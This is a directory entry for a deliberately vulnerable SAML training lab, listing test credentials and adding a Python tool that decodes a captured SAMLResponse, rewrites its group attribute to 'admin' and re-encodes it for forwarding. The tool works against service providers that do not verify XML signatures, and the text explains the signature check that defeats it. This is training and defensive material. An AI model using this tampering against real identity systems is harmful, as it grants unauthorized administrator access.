OWASP Vulnerable Web Applications Directory

An OWASP production project

A comprehensive registry of known vulnerable web and mobile applications for legal security testing and training.

Vulnerable SAML App

Vulnerable SAML infrastructure: IdP and SP Docker images showcasing exploitable SAML configurations (e.g. privilege escalation by changing the group attribute in the SAML response). Based on a modified OneLogin Python SAML library; includes a CVE-2017-11427 test user.

Collections offline
Technology Python PHP Docker SAML
Categories Free-form Single-player
Author yogisec
Stars 54 stars
Last contribution Nov 2, 2020

Notes

Start with docker-compose up; the app is at http://127.0.0.1:8000. Users: yogi/bear (unprivileged), admin/(typo password in README), brubble/password (CVE), instructor/(see README). Escalate yogi to admin by changing the group attribute in the SAML response before it reaches the SP.
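The escalation described above, as an added example that is not code from the vulnerable-saml-app project: a small tool that takes a base64 SAMLResponse (HTTP-POST binding), rewrites the group attribute, and re-encodes it. The SAML Response it operates on is constructed here, unsigned and issued by a made-up IdP; the attribute name "group", the values "users"/"admin", the IdP URL and all function names are assumptions, not details taken from the project. The edit only works against an SP that accepts an assertion without verifying its XML signature, which is the misconfiguration this project sets up; a correctly configured SP rejects the tampered message.

```python
"""Tamper with the group attribute of a SAML Response (HTTP-POST binding).

Added example for this directory entry; not code from vulnerable-saml-app.
The response below is constructed for the demo and carries no signature.
"""
import base64
import xml.etree.ElementTree as ET

NS = {
    "samlp": "urn:oasis:names:tc:SAML:2.0:protocol",
    "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
    "ds": "http://www.w3.org/2000/09/xmldsig#",
}
for _prefix, _uri in NS.items():
    ET.register_namespace(_prefix, _uri)

# Constructed response for the unprivileged user. The attribute name
# "group", its value and the issuer URL are assumptions, not project facts.
SAMPLE_RESPONSE_XML = """<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_r1" Version="2.0">
  <saml:Issuer>http://idp.example.test/metadata</saml:Issuer>
  <saml:Assertion ID="_a1" Version="2.0">
    <saml:Issuer>http://idp.example.test/metadata</saml:Issuer>
    <saml:Subject><saml:NameID>yogi</saml:NameID></saml:Subject>
    <saml:AttributeStatement>
      <saml:Attribute Name="group">
        <saml:AttributeValue>users</saml:AttributeValue>
      </saml:Attribute>
    </saml:AttributeStatement>
  </saml:Assertion>
</samlp:Response>"""


def sample_response_b64():
    """The constructed response encoded as a browser would POST it."""
    return base64.b64encode(SAMPLE_RESPONSE_XML.encode()).decode("ascii")


def decode_response(b64):
    """Decode a SAMLResponse form field. The HTTP-POST binding is base64
    only; the HTTP-Redirect binding also deflates, which is not handled."""
    return ET.fromstring(base64.b64decode(b64))


def encode_response(root):
    return base64.b64encode(ET.tostring(root, encoding="utf-8")).decode("ascii")


def is_signed(root):
    """Reconnaissance: does the message carry any XML signature at all?
    Presence is not validity; a signed message has to be verified with an
    XML-DSig library such as xmlsec, which this demo deliberately omits.
    If the assertion is signed and the SP verifies it, the edit below fails."""
    return root.find(".//ds:Signature", NS) is not None


def get_attribute_values(root, name):
    values = []
    for attr in root.iterfind(".//saml:Attribute", NS):
        if attr.get("Name") == name:
            values.extend(v.text or "" for v in attr.iterfind("saml:AttributeValue", NS))
    return values


def set_attribute_value(root, name, value):
    """Overwrite every value of the named attribute; returns how many changed."""
    changed = 0
    for attr in root.iterfind(".//saml:Attribute", NS):
        if attr.get("Name") == name:
            for v in attr.iterfind("saml:AttributeValue", NS):
                v.text = value
                changed += 1
    return changed


def escalate(b64, name="group", value="admin"):
    """Return a re-encoded SAMLResponse with the group attribute rewritten."""
    root = decode_response(b64)
    if set_attribute_value(root, name, value) == 0:
        raise ValueError(f"no attribute named {name!r} in the response")
    return encode_response(root)


def subject(root):
    node = root.find(".//saml:Subject/saml:NameID", NS)
    return node.text if node is not None else None


if __name__ == "__main__":
    tampered = escalate(sample_response_b64())
    root = decode_response(tampered)
    print("signed:", is_signed(root))
    print("subject:", subject(root), "groups:", get_attribute_values(root, "group"))
```

In practice the input is the SAMLResponse value captured from the IdP's POST to the SP (for example in an intercepting proxy), and the tampered value is what gets forwarded. Run is_signed first: if the assertion is signed and the SP actually verifies it, the group change will be rejected, which is the check a hardened SP performs and the vulnerable one here does not.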
